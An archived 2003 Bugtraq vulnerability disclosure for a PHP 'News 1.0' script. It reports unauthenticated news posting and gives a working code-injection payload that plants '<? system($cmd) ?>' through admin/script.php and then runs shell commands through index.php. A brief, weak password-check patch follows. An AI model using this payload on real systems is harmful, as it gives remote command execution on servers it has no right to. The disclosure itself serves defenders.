Vulnerability in News/ξΟΧΟΣΤΙ

From: Over_G (overg@mail.ru)
Date: 03/31/03

  • Next message: BrainRawt .: "CGI Citys CCLOG and CCGuestbook Script Injection Vulns Fixed!!!"
    Date: Mon, 31 Mar 2003 17:16:39 +0400
    From: Over_G <overg@mail.ru>
    To: bugtraq@securityfocus.com
    
    

    Product: News
    Version: 1.0
    OffSite: http://xonix.ru
    Problem: Add news
    --------------------------------------

    You may add news without autorization.

    http://[target]/admin/script.php?data=ENTER_THIS_YOUR_NEWS.

    example:

    http://[target]/admin/script.php?data=script.php?data=<? system($cmd) ?>
    then open http://[target]/index.php?cmd=id;uname -a;
    etc...

    Patch.

    Add in index.php :
    <input type=hidden name=pass value=<?=$pass?>> Before </form>

    And add in script.php after include("config.php");
    if (!isset($pass)) exit;
    $q=strcmp($pass,$password);

    greetz: GipsHack, DHGroup, subj, Lobst, and all, who know me

    Contacts: www.overg.com www.dwcgr0up.com
    irc.zaingandol.org #DWC
    ogprog@ukr.net

    Best regards, Over G[DWC Gr0up]


  • Next message: BrainRawt .: "CGI Citys CCLOG and CCGuestbook Script Injection Vulns Fixed!!!"

    Relevant Pages

    • Re: Problem with inotify
      ... > The good news is that the hang is gone. ... the oops and below is the resulting patch. ... send the line "unsubscribe linux-kernel" in ...
      (Linux-Kernel)
    • Re: Any news... this just in
      ... But not good news. ... From the tech support contact I've ... "The patch has been delayed due to technical ... >>Microsoft Office and Microsoft Office related News ...
      (microsoft.public.outlook.general)
    • Real-life (almost) dynamic range test.
      ... Good news 1: Yow! ... This thing has FIVE full stops of range over medium gray. ... Each step is 1/3 of a stop, so the overexposed image has the "M" patch at ... Zone I is patch "10" in the underexposed image, ...
      (rec.photo.digital)
    • Re: compaq 6515b turion x2 laptop
      ... I will look at the dmesg and send it to you.. ... A dmesg will be very helpful for me to write a patch from, ... actually I have good news and I have bad news. ... between the SATA controller and another device in the system (likely the ...
      (freebsd-arch)
    • Re: Hotfix remove / Uninstall
      ... a switch to uninstall the patch. ... Some one on software_updates news group ...
      (microsoft.public.sms.swdist)